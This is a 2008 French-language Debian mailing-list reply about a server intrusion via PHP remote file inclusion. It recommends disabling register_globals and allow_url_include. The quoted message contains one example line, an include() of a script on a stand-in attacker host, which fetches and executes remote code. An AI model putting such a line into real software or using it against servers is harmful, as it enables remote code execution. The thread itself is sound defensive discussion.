Re: [resolu] awstats (innocenté), sarge, intrusion

To: debian-user-french@lists.debian.org
Subject: Re: [resolu] awstats (innocenté), sarge, intrusion
From: Franck Joncourt <franck.mail@dthconnex.com>
Date: Sat, 07 Jun 2008 10:19:17 +0200
Message-id: <[🔎] 484A4485.6010502@dthconnex.com>
In-reply-to: <[🔎] 20080606210047.5d336826.user.anti-spam@maison.homelinux.net>
References: <20080527221204.f03f430f.user.anti-spam@maison.homelinux.net> <483D72B1.8080302@gmail.com> <20080530214438.67864cd3.user.anti-spam@maison.homelinux.net> <48405D58.20304@plouf.fr.eu.org> <[🔎] 20080604221154.77266434.user.anti-spam@maison.homelinux.net> <[🔎] 20080605165003.9b063bd5.user.anti-spam@maison.homelinux.net> <[🔎] 484804F4.7040908@gmail.com> <[🔎] 20080605205149.f441853e.user.anti-spam@maison.homelinux.net> <[🔎] 20080606210047.5d336826.user.anti-spam@maison.homelinux.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

François Boisson wrote:
> Le Thu, 5 Jun 2008 20:51:49 +0200
> François Boisson <user.anti-spam@maison.homelinux.net> a écrit:

Salut,

> En fait c'est extrèmement simple:
> 
> un include("http://monsite.labas.pirate/scriptdelamort.quitue";);
> 
> télécharge le script sur le site ET l'éxécute comme un script PHP. À partir de
> là on fait ce qu'on veut. Donc effectivement c'est relativement simple.
> 
> Je n'aurais pas pensé que include faisait un tel chargement sur des sites
> extérieurs. C'est une fonction assez dangeureuse.


Dans la configuration php :

$register_globals = Off
pour éviter que le client passe des valeurs à des variables non
initialisées.

$allow_url_include = Off
pour éviter de traiter des urls style http ou ftp dans les include.

Cela devrait t'éviter des problèmes similaires :p!

Bonne journée.

- --
Franck Joncourt
http://debian.org - http://smhteam.info/wiki/
Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkhKRIUACgkQxJBTTnXAif7GswCfQfvb1slfkx5cYS7Y1EckT8ws
tFMAn0XQGy+8b11v3Br/yu0spPYEEhRy
=8XRz
-----END PGP SIGNATURE-----

Reply to:

References:
- Re: awstats, sarge
  - From: François Boisson <user.anti-spam@maison.homelinux.net>
- [resolu] awstats (innocenté), sarge, intrusion
  - From: François Boisson <user.anti-spam@maison.homelinux.net>
- Re: [resolu] awstats (innocenté), sarge, intrusion
  - From: "Jean-Yves F. Barbier" <12ukwn@gmail.com>
- Re: [resolu] awstats (innocenté), sarge, intrusion
  - From: François Boisson <user.anti-spam@maison.homelinux.net>
- Re: [resolu] awstats (innocenté), sarge, intrusion
  - From: François Boisson <user.anti-spam@maison.homelinux.net>

Prev by Date: Re: NVidia Geforce, ACPI et Ventilo [résolu/contourné]
Next by Date: Re: question de routage un peu HS
Previous by thread: Re: [resolu] awstats (innocenté), sarge, intrusion
Next by thread: nouvelle CM et détection disques durs IDE
Index(es):
- Date
- Thread